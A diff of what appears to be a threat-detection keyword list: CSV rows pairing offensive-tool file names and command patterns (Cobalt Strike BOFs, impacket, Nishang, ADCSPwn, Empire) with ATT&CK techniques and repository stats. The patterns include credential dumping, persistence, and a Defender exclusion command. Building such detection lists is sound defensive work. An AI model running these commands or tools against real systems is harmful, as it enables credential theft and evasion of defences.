-"*adconnectdump-master*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","506","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" -"*adcs_enum.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" -"*adcs_enum_com.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" -"*adcs_enum_com2.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" -"*ADCS_Maybe_ESC8_HTTPS_Vulnerable.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*adcsattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*adcskiller.py*","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","6","535","53","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z" +"*ADCollector.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*adconnectdump.py*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" +"*adconnectdump-master*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" +"*adcs_enum.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*adcs_enum_com.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*adcs_enum_com2.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*ADCS_Maybe_ESC8_HTTPS_Vulnerable.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*adcsattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*adcskiller.py*","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","6","536","53","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z" "*ADCSPwn.csproj*","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","749","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" "*ADCSPwn.exe*","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","749","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" -"*ADCSPwn.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*ADCSPwn.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*ADCSPwn.sln*","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","749","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" "*ADCSPwn-master*","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","749","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" "*add_evasion check_fast_forwarding*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" @@ -7023,26 +7166,27 @@ "*Add_Privilege /Process:* /Privilege:*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" "*addcomputer.py -computer-name * -computer-pass * -dc-host * -domain-netbios *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*addcomputer.py -delete -computer-name * -dc-host * -domain-netbios *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*addcomputer.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*Add-ConstrainedDelegationBackdoor*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Add-Exfiltration.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*addcomputer.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*Add-ConstrainedDelegationBackdoor*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Add-Exfiltration.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*Add-KeePassConfigTrigger*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" -"*AddKeePassTrigger.ps1*","offensive_tool_keyword","crackmapexec","Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*AddKeePassTrigger.ps1*","offensive_tool_keyword","crackmapexec","Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*AddKeePassTrigger.ps1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*Add-MpPreference -ExclusionPath *","offensive_tool_keyword","powershell","Windows Defender evasion add an exclusion directory for your shady stuff","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder*CN=System' -PrincipalSamAccountName * -Rights All*","offensive_tool_keyword","powerview","modifying existing permissions on an Active Directory object ('AdminSDHolder'). which can be used to maintain unauthorized access or escalate privileges in the targeted environment. The 'AdminSDHolder' container plays a crucial role in managing the security of protected groups in Active Directory. and modifying its permissions may lead to unintended security consequences.","T1222","TA0003","N/A","N/A","Persistence","https://github.com/zloeber/PSAD/blob/master/src/inprogress/Add-ObjectACL.ps1","1","0","N/A","N/A","1","15","2","2017-10-26T20:35:53Z","2017-07-07T13:34:07Z" -"*Add-Persistence *","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Add-Persistence*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Add-Persistence.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Add-Persistence *","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Add-Persistence*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Add-Persistence.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*addpriv SeloadDrivePrivilege*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - 